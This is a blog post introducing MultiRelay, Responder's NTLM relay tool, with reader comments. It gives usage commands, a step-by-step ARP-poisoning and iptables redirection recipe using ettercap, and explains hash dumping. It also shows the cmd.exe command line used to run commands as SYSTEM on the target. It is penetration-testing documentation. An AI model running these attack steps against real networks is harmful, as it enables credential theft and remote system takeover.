MultiRelay Description:
MultiRelay is a powerful pentest utility included in Responder's tools folder, giving you the ability to perform targeted NTLMv1 and NTLMv2 relay on a selected target.
Currently MultiRelay relays HTTP, WebDav, Proxy and SMB authentications to an SMB server.
This tool can be customized to accept a range of users to relay to a target. The concept behind this is to only target domain Administrators, local Administrators, or privileged accounts.
Once a relay has been successful, MultiRelay will give you an interactive shell allowing you to:
Once a relay has been successful, MultiRelay will give you an interactive shell allowing you to:
- Remotely dump the LM and NT hashes on the target.
- Remotely dump any registry keys under HKLM.
- Read any file on the target.
- Download any file on the target.
- Execute any command as System on the target.
Usage Overview:
Most of the time, MultiRelay can be run with the following options:
- ./tools/MultiRelay.py -t Target_IP -u Administrator DAaccount AnotherAdmin
MultiRelay comes with a set of 3 options:
- -p: Add an extra listening port for HTTP, WebDav, Proxy requests to relay.
- -u: A list of users to relay. -u can also be set to "ALL" to target all users.
- -t: The target
MultiRelay will start by fingerprinting your target and tell you if SMB Signing is mandatory and if so, will let you know that you should target another server.
Another useful utility included in Responder's tools folder is RunFinger.py. RunFinger accepts a single IP address or a class C range and will tell you the following for a given target:
- Os version
- Domain joined
- Signing is mandatory or not.
RunFinger can dump this information in a grepable format by using the -g command line switch:
root@lgandx:~/Responder-2.3.3.0# ./tools/RunFinger.py -g -i 10.10.20.0/24
Wich will output something like:
...
[10.10.20.41: 'Windows Server 2012 Standard 9200', domain: 'CORP', signing:'False']
[10.10.20.36: 'Windows Server 2012 R2 Standard 9600', domain: 'CORP', signing:'False']
[10.10.20.22: 'Windows Server 2012 Standard 9200', domain: 'CORP', signing:'False']
[10.10.20.43: 'Windows Server 2012 Standard 9200', domain: 'CORP', signing:'False']
[10.10.20.49: 'Windows Server 2012 R2 Standard 9600', domain: 'CORP', signing:'True']
[10.10.20.35: 'Windows Server 2012 R2 Standard 9600', domain: 'CORP', signing:'False']
[10.10.20.40: 'Windows Server 2012 Standard 9200', domain: 'CORP', signing:'False']
....
This utility is useful for mapping networks and to carefully select a target.
Running The Tool, The Common Scenario:
MultiRelay was built to work in conjunction with Responder.py, the common usage scenario is:
- Set SMB and HTTP to Off in Responder.conf
- ./Responder.py -I eth0 -rv on one screen
- ./tools/MultiRelay.py -t Target_IP -u Administrator DAaccount OtherAdmin on another one.
In this scenario all NBT-NS, LLMNR lookups will be resolved with Responder.py to our IP address, MultiRelay will be listening on TCP port 80, 3128, 445 and will be waiting for incoming connections.
Once a connection is received, MultiRelay will be parsing all authentication requests and will verify if:
- The user authentication is allowed to be relayed on the target.
- This user has already been relayed to our target and if the server returned a logon failure.
If this user was previously relayed and the server returned a logon failure, this user will be blacklisted for further authentication.
This is done to prevent account lockouts. This check can be reset by deleting the SMBRelay-Session.txt file in Responder logs folder.
Even if a user is not allowed to be relayed, his NTLMv1/v2 sets of credentials will be captured and stored in Responder logs folder as "SMB-Relay-CLIENTIP.txt", so you won't lose any hashes while running MultiRelay.py
The LLMNR/NBT-NS Disabled Scenario:
MultiRelay can also be easily used in combination with ARP poisoning attacks, in this scenario let's assume:
- Switch IP: 10.10.10.254
- File server: 10.10.10.20
- Backup file server (target): 10.10.10.24
- Our IP: 10.10.10.201
After some reconnaissance, we know for fact that once in a while the target is syncing with the File sharing server using its Administrator account.
We can therefore setup the following targeted ARP poisoning attack:
Lets enable IP forwarding.
- echo 1 > /proc/sys/net/ipv4/ip_forward
We will be dropping all outgoing ICMP. This prevents the kernel sending port/host unreachable to our target.
- iptables -A OUTPUT -p ICMP -j DROP
Since all packets will be going through our box, let's rewrite the destination address and port on the fly for all SMB requests destinated to 10.10.10.20:445 to our IP 10.10.10.201:445.
- iptables -t nat -A PREROUTING -p tcp --dst 10.10.10.20 --dport 445 -j DNAT --to-destination 10.10.10.201:445
Launch MultiRelay:
- ./tools/MultiRelay.py -t10.10.10.20 -U Administrator
And finally, launch the actual attack, we only target the backup fileshare:
- ettercap -T -q -w AttackDump-01.pcap -p -M arp:remote /10.10.10.254// /10.10.10.24//
MultiRelay Functionalities:
Once a relay has been successfull, MultiRelay will let you:
- Dump registry key and subkeys remotely.
This is done by making a DCE/RPC call to the Windows Remote Registry pipe, saving the key on the SMB server and finally making a read request to the selected saved key.
- Dump the SAM database remotely.
This is done by extracting the bootkey and saving the SAM key locally. Responder includes a version of creddump which will parse and output the hashes.
- Read a file on the target SMB server.
Simple SMB read request on a given file.
- Download a file from the SMB server.
Same as read file, but we save the output locally.
- Execute a command as system on the server.
This one is done by making a DCE/RPC call to the Windows Services Control Manager and remotely creating a service which will run this command:
- cmd.exe /C echo del /F /Q Filename.bat ^&^User defined command goes here^>Windows\Temp\Results.txt >Filename.bat& cmd.exe /C call Filename.bat&exit
That is:
- echo "del /F /Q Filename.bat ^&^User defined command goes here^>Windows\Temp\Results.txt" into Filename.bat
- run Filename.bat and exit.
We then make a SMB read request on Results.txt, and we print the output to the user console.
Download link: https://github.com/lgandx/Responder
Download link: https://github.com/lgandx/Responder
Thanks:
- DiabloHorn https://diablohorn.com/2013/10/24/remote-hash-dumping-no-processes-or-tool-upload-needed/
- Alberto Solino (@agsolino) smbrelayx and Impacket: https://github.com/CoreSecurity/impacket
- Brendan Dolan-Gavitt (@moyix): http://moyix.blogspot.com/2008/02/creddump-extract-credentials-from.html and https://github.com/moyix/creddump
10 comments:
Dude please fix that ASAP. It makes responder useless:
http://security.stackexchange.com/questions/139957/responder-smbv2-and-cracking
This bug should be reported on github ( https://github.com/lgandx/Responder/issues )if latest version was used (2.3.3.0).
Thanks.
Bug fixed. Thanks for letting me know!
Excellent job Laurent!
Bonjour Laurent,
Super boulot. Par contre quelque chose m'échappe quant à l'attaque avec Ettercap.
Pourquoi lors que tu utilises ETTERCAP tu ne hijack pas la communication entre le serveur de fichier et le serveur backup ?
Un peu comme on le ferait sur une communication entre une station et une gw pour intercepter le trafic sortant ?
Quelle est l'intérêt de hijacker l'IP du switch ?
A+,
Christophe
Good Job Laurent, is it avaiable to relay the HTTP 407 Proxy unauthorized NTMLv2 (-P option) using multirelay?
Thanks, yes it is possible, just need to set HTTP and SMB off in Responder.conf ;)
Hi Laurent,
Great job for the tool.
I still have a question about the scenario. Like Christophe said, why do you target the switch?
The switch IP is only used for administration.
Regards,
jchibbra
localt0ast likes this
Is it possible to use Responder to only poison requests from/to certain ip address?
I would like to test it in our DMZ, but I fear that the network will go down.
Post a Comment